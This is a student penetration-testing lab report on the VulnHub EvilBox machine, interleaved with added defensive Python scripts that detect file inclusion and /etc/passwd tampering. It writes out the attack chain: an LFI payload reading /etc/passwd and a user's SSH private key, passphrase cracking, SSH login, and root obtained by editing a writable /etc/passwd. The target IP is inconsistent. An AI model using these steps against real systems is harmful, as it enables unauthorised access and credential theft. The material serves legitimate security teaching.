
Lab Assignment 05a


Bangladesh University of Professionals (BUP)

M.Sc. in Cyber Security

Course Code: MCS 1101


Course Name: Cyber Security Fundamentals

Lab Assignment No: 05a

Penetration Testing EvilBox

Submitted To:
Engr. Md. Mushfiqur Rahman
Guest Faculty, Dept of CE
Bangladesh University of Professionals (BUP)
Dhaka, Bangladesh.

Submitted By:
Sree Pradip Kumer Sarker
ID No: 24525201005
M.Sc. in Cyber Security
BUP, Dhaka, Bangladesh.

Penetration Testing EvilBox

First download the EvilBox machine from this link:

https://www.vulnhub.com/entry/evilbox-one,736/

Now start both the VulnHub and Parrot machines, putting them on the same network.
Now, from Parrot, scan the network block for live IP addresses to find the IP of the EvilBox machine using
netdiscover.
#netdiscover -r 192.168.100.0/24

We can also use fping to see available ip addresses which we can reach:
#fping -aqg 192.168.100.0/24
-a: Show only the hosts that are alive.
-q: Quiet output. Only displays the summary or results.
-g: Generate a list of IPs from the given IP range or subnet.

This is fast, flexible and simple.
Let's scan for open ports on this IP, 192.168.100.10, or we can scan all of the hosts to see which ones have
open ports.
#nmap -sC -sV 192.168.100.10

#nmap -v -T4 -p- -A -oN nmap.log 192.168.100.10

nmap: The network scanning tool.
-v: Increase verbosity, providing more detailed output.
-T4: Set the timing template to 4 (Aggressive), which speeds up the scan.
-p-: Scan all 65,535 ports.
-A: Enable OS detection, version detection, script scanning, and traceroute.
-oN nmap.log: Output the results in normal format to the file nmap.log.

This port scan gives us an idea of which ports the host is serving and which are open, which OS version is
running, which version of each service is running, etc.
Now we can see that 2 ports are open: 22 and 80.
We can look for directories on the port 80 web server; first we check whether the web server is up.

So it's open. Now we search for directories via directory brute force using gobuster:

#gobuster dir -u http://192.168.100.10 -w /usr/share/wordlists/directory-list-2.3-medium.txt -x php,html,txt -o dir.log
gobuster: The tool used for brute forcing URIs (directories and files) in web servers.
dir: The mode to use, in this case, directory brute forcing.
-r: Follow redirects.
-u http://10.0.0.12/: The URL of the target web server.
-w /usr/share/wordlists/directory-list-2.3-medium.txt: The wordlist to use for brute forcing.
-x php,html,txt: The file extensions to append to each wordlist entry.
-o dir.log: Output the results to the file dir.log.

Here we get index.html, robots.txt, the /secret folder and the /server-status folder.

Now we scan for folders and files in the other two directories we found.

We found an evil.php file in the secret directory. We need to fuzz this file to find any hidden parameters it
accepts. To do that we need to install Go and the ffuf fuzzer on Parrot.
#apt update
#apt install golang
#go install github.com/ffuf/ffuf/v2@latest
#nano .bashrc
Add the line export PATH=$PATH:$HOME/go/bin, then save and exit.
#source .bashrc

Or we can just write:

#apt install ffuf
Now we fuzz the PHP file with ffuf to find any hidden parameters it accepts:
#ffuf -c -r -u 'http://10.0.0.12/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0
ffuf: The tool being used.
-c: Colorize the output.
-r: Follow redirects.
-u 'http://10.0.0.12/secret/evil.php?FUZZ=/etc/passwd': The target URL with FUZZ as the placeholder
for the fuzzing input.
-w /usr/share/seclists/Discovery/Web-Content/common.txt: The wordlist to use for fuzzing.
-fs 0: Filter out results with a response size of 0 bytes.

Here we find that command is the parameter name accepted in place of FUZZ. Let's try it and open the /etc/passwd
file, where the system's user account information is stored.

Now, to get the source code of evil.php, we can use curl or the browser URL, but we have to fetch the page in an
encoded form, because the web server executes a PHP file rather than returning it as text.

PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydjb21tYW5kJ107CiAgICBpbmNsdWRlKCRmaWxlbmFtZSk7Cj8+Cg==
So this is the base64-encoded evil.php file we got. Now we decode this base64 string and get the evil.php
source code.
#base64 -d <<< PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydjb21tYW5kJ107CiAgICBpbmNsdWRlKCRmaWxlbmFtZSk7Cj8+Cg==

This is the PHP code written in the evil.php file.
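The base64 string above decodes to a few lines of PHP in which a request parameter is passed straight into include(), which is the whole reason evil.php can be asked for /etc/passwd. The following Python script is an added example, not part of the assignment or of the EvilBox machine: it decodes the transcript shown above and runs a small, one-hop taint check that flags any include/require whose argument is a superglobal or a variable assigned from one. The regexes and the SUPERGLOBAL/INCLUDE_CALL names are my own assumptions for a triage aid, not a full static analyser; the fix on the PHP side is to never include a path taken from the request and to map a fixed set of allowed names to files instead.

```python
import base64
import re

# The base64 transcript of evil.php obtained in the write-up above
# (copied from the page; decoding it reproduces the file's source).
EVIL_PHP_B64 = (
    "PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydjb21tYW5kJ107CiAgICBpbmNsdWRlKC"
    "RmaWxlbmFtZSk7Cj8+Cg=="
)

# PHP superglobals that carry attacker-controlled request data.
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)"
# Functions that load and execute the file named by their argument.
INCLUDE_CALL = r"\b(?:include|include_once|require|require_once)\b\s*\(?\s*(\$\w+)"


def decode_php_source(b64_text: str) -> str:
    """Turn the base64 transcript of a PHP file back into readable source."""
    return base64.b64decode(b64_text).decode("utf-8")


def find_user_controlled_includes(source: str):
    """Return (line_number, line) pairs where include/require is fed user input.

    Two cases are caught: a superglobal passed straight into the include, and a
    variable that was assigned from a superglobal earlier in the file (one-hop
    taint tracking, deliberately simple: a triage aid, not a full SAST tool).
    """
    tainted = set()
    findings = []
    for number, line in enumerate(source.splitlines(), start=1):
        assign = re.search(r"(\$\w+)\s*=\s*" + SUPERGLOBAL, line)
        if assign:
            tainted.add(assign.group(1))
        call = re.search(INCLUDE_CALL, line)
        if call:
            var = call.group(1)
            if var in tainted or re.fullmatch(SUPERGLOBAL, var):
                findings.append((number, line.strip()))
    return findings


if __name__ == "__main__":
    src = decode_php_source(EVIL_PHP_B64)
    print(src)
    for number, line in find_user_controlled_includes(src):
        print(f"line {number}: user-controlled include -> {line}")
```

Running the script prints the decoded source and reports line 3, the include($filename) call, because $filename was assigned from $_GET on line 2.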


Now, from the passwd file, we got a user named mowree. We will look in its home directory for personal files
that may help us exploit the target.

#http://192.168.100.10/secret/evil.php?command=/home/mowree/.ssh/id_rsa
From here we got an RSA private key.
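Every request made against evil.php above (the /etc/passwd read, the id_rsa read, and the parameter fuzzing before them) lands in the web server's access log, so the defender's counterpart to this section is a log check. The script below is an added example, not part of the assignment: it parses constructed Apache combined-format lines modelled on those requests (sample data, not a log from the real machine) and flags query-parameter values that are absolute paths to sensitive files, contain traversal sequences, or carry a URL-style stream wrapper. The log lines, the SENSITIVE_PATH list and the function names are my own choices.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache "combined" access-log lines modelled on the requests made in
# this write-up (sample data, not a log captured from the real machine).
SAMPLE_LOG = """\
192.168.100.20 - - [10/May/2024:10:01:02 +0600] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.100.20 - - [10/May/2024:10:02:15 +0600] "GET /secret/evil.php?command=/etc/passwd HTTP/1.1" 200 1403 "-" "curl/7.88.1"
192.168.100.20 - - [10/May/2024:10:03:40 +0600] "GET /secret/evil.php?command=/home/mowree/.ssh/id_rsa HTTP/1.1" 200 1823 "-" "Wget/1.21"
192.168.100.20 - - [10/May/2024:10:04:01 +0600] "GET /secret/evil.php?command=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.100.30 - - [10/May/2024:10:05:11 +0600] "GET /secret/evil.php?command=about.html HTTP/1.1" 200 230 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Absolute paths a web application has no business opening on behalf of a client.
SENSITIVE_PATH = re.compile(r"^/(?:etc|root|proc|var/log)/|^/home/[^/]+/\.ssh/")


def classify_value(value: str):
    """Return the reasons one query-parameter value looks like a file-inclusion attempt."""
    reasons = []
    if "../" in value or "..\\" in value:
        reasons.append("path traversal")
    if SENSITIVE_PATH.search(value):
        reasons.append("absolute path to sensitive file")
    if "://" in value:
        reasons.append("stream wrapper or remote URL")
    return reasons


def detect_lfi(log_text: str):
    """Scan access-log lines and return one record per suspicious parameter value."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes values, so encoded traversal is seen as "../".
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "path": parts.path,
                    "param": param,
                    "value": value,
                    "status": int(m.group("status")),
                    "reasons": reasons,
                })
    return hits


def hits_per_source(hits):
    """Count suspicious requests per client IP; a burst from one host is the fuzzing run."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = detect_lfi(SAMPLE_LOG)
    for h in found:
        print(f'{h["ip"]} {h["path"]}?{h["param"]}={h["value"]} -> {", ".join(h["reasons"])}')
    print(hits_per_source(found))
```

On the sample data the three evil.php requests for system files are reported and the about.html request is not; the per-IP count is what you would alert on, since a parameter-fuzzing run produces hundreds of such lines from one address in a few seconds.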

Now, to get this key onto our machine, we can use wget.
#wget 'http://192.168.100.10/secret/evil.php?command=/home/mowree/.ssh/id_rsa'
Now, before we crack and use the key, we first restrict the file's permissions (ssh refuses to use a private key
file that other users can read).
#chmod 600 id_rsa

Now, to crack the passphrase, we use John the Ripper.

To convert the key into a hash format John understands, we use the ssh2john.py script.

For the wordlist, download rockyou.txt.

So this is the passphrase that matches the hash of the id_rsa file.
Now let's use this key to log into the server as the user "mowree".

#ssh mowree@192.168.100.10 -i id_rsa

Here we can see we got a shell on the EvilBox server using its RSA private key.
Now we want to escalate to root, so we hash the word 'root' and put the hash in place of the 'x' next to root
in the /etc/passwd file.

Here we hash the word 'root' using openssl.
Before putting it in the /etc/passwd file, we tried to switch to root using a different password.

That failed. Now we take the hash of the word 'root' and paste it into the /etc/passwd file after root: in
place of the x.
#nano /etc/passwd

We now switch to the superuser using 'root' as the password, which is what we placed in the /etc/passwd file.
Being able to edit this file as another user such as mowree is the vulnerability that makes this possible.
So the ownership of this file and its write permissions must be kept strict.
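The escalation above leaves two artefacts a host check can catch: /etc/passwd has a password hash in a field that should only ever hold "x" (the real hashes belong in /etc/shadow), and the file itself was writable by an unprivileged user. The script below is an added example, not part of the assignment, that audits both conditions. The passwd excerpts are constructed (the hash in the tampered copy is a placeholder, not a real hash), and the function names and the SHADOWED_MARKERS set are my own assumptions.

```python
import os
import stat

VALID_FIELD_COUNT = 7

# Constructed /etc/passwd excerpts: a normal file and one edited the way the
# write-up describes (a hash placed where root's "x" should be).
# The hash below is a placeholder string, not a real password hash.
CLEAN_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
"""
TAMPERED_PASSWD = """\
root:$1$CONSTRUCTED$placeholderhash.:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
"""

# Values that legitimately appear in the password field when hashes live in /etc/shadow.
SHADOWED_MARKERS = {"x", "*", "!", "!!"}


def audit_passwd_entries(text: str):
    """Flag entries whose password field holds something other than a shadow marker.

    A hash placed here bypasses /etc/shadow entirely, which is exactly the change
    made to root in this lab. Malformed lines are reported too, since an editing
    slip in this file can lock every account out.
    """
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != VALID_FIELD_COUNT:
            findings.append((number, fields[0], "malformed entry"))
            continue
        user, pw_field = fields[0], fields[1]
        if pw_field not in SHADOWED_MARKERS:
            label = "empty password field" if pw_field == "" else "password hash stored in /etc/passwd"
            findings.append((number, user, label))
    return findings


def audit_passwd_mode(mode: int, owner_uid: int):
    """Check what /etc/passwd's mode and owner should be: root-owned and never group/world writable."""
    problems = []
    if owner_uid != 0:
        problems.append("not owned by root")
    if mode & stat.S_IWGRP:
        problems.append("group-writable")
    if mode & stat.S_IWOTH:
        problems.append("world-writable")
    return problems


def audit_passwd_file(path: str = "/etc/passwd"):
    """Run both checks against a real file on disk."""
    st = os.stat(path)
    with open(path, encoding="utf-8") as fh:
        entries = audit_passwd_entries(fh.read())
    return {"entries": entries, "mode": audit_passwd_mode(st.st_mode, st.st_uid)}


if __name__ == "__main__":
    print(audit_passwd_entries(TAMPERED_PASSWD))
    print(audit_passwd_mode(0o100666, 1000))
    print(audit_passwd_file())
```

On a healthy Debian-style host audit_passwd_file() returns empty lists for both keys; the tampered excerpt reports root's entry, and a mode of 0666 reports both group- and world-writable, which is the condition that let mowree rewrite the file in the first place.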
